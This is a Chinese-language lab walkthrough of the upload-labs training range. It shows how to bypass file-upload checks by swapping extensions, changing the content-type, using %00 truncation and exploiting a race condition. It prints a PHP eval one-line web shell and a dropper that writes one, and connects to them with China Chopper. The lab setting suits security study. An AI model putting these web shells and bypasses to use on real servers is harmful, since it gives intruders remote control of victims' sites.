upload-labs上传漏洞靶场--pass1,2,11,12,17

upload-labs上传漏洞靶场

1、pass-1改变文件后缀名

新建一句话木马文件:<?php @eval($_POST['x']);?>,并上传。
upload-labs上传漏洞靶场--pass1,2,11,12,17
发现.php文件上传失败,只能使用图片上传
upload-labs上传漏洞靶场--pass1,2,11,12,17
我们修改.php文件的后缀名为.jpg上传,并使用burp抓包
upload-labs上传漏洞靶场--pass1,2,11,12,17upload-labs上传漏洞靶场--pass1,2,11,12,17
upload-labs上传漏洞靶场--pass1,2,11,12,17
将.jpg修改成.php后,关闭拦截,发送成功
这时,我们复制图片地址,打开菜刀,新建项目
upload-labs上传漏洞靶场--pass1,2,11,12,17
upload-labs上传漏洞靶场--pass1,2,11,12,17
填写相应信息
upload-labs上传漏洞靶场--pass1,2,11,12,17
成功进入对方电脑
upload-labs上传漏洞靶场--pass1,2,11,12,17

2、pass-2改变content-type

上传.php文件
upload-labs上传漏洞靶场--pass1,2,11,12,17
抓包
upload-labs上传漏洞靶场--pass1,2,11,12,17
修改content-type为image/jpeg
upload-labs上传漏洞靶场--pass1,2,11,12,17
放包后,进入菜刀,新建连接测试
upload-labs上传漏洞靶场--pass1,2,11,12,17
成功!

3、文件截断上传

upload-labs上传漏洞靶场--pass1,2,11,12,17
(1)pass-11直接修改地址
新建PHP文件,将后缀名修改为.php.%00.jpg
上传抓包
upload-labs上传漏洞靶场--pass1,2,11,12,17
Post中修改路径
upload-labs上传漏洞靶场--pass1,2,11,12,17
放包,上传
upload-labs上传漏洞靶场--pass1,2,11,12,17
复制图片地址,菜刀链接成功
upload-labs上传漏洞靶场--pass1,2,11,12,17
(2)Pass12修改编码
按下述内容上传文件
upload-labs上传漏洞靶场--pass1,2,11,12,17
修改地址,使它以.php保存
upload-labs上传漏洞靶场--pass1,2,11,12,17
添加隔断符(图片打错字了)
upload-labs上传漏洞靶场--pass1,2,11,12,17
放包上传,步骤与之前一样,然后菜刀验证
upload-labs上传漏洞靶场--pass1,2,11,12,17
成功!

4、竞争上传pass-17

竞争上传需要在目录下新建一句话木马PHP文件
H2.PHP:<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"])?>’);?>(运行后,生成一句话木马文件,shell.php)
上传成功,但是因为网页没有对上传的文件做类型处理,无论什么文件都会上传成功,但是根据系统设置,非图片文件会被马上杀掉。
upload-labs上传漏洞靶场--pass1,2,11,12,17
这个时候,我们使用burp抓包,使用测试器反复执行,yiju2.php会被反复上传。
upload-labs上传漏洞靶场--pass1,2,11,12,17
upload-labs上传漏洞靶场--pass1,2,11,12,17
upload-labs上传漏洞靶场--pass1,2,11,12,17
这之后,我们构造已经传入了yiju2.php的情况,在浏览器中进入该地址
http://172.16.16.23/upload-labs/upload/yiju2.php
运行,并在此使用burp抓包,并重复上述测试器的步骤
目的在于执行yiju2.php,生成shell.php文件,这时的shell.php文件为一句话木马。创建木马文件成功。
upload-labs上传漏洞靶场--pass1,2,11,12,17
使用菜刀进行测试
upload-labs上传漏洞靶场--pass1,2,11,12,17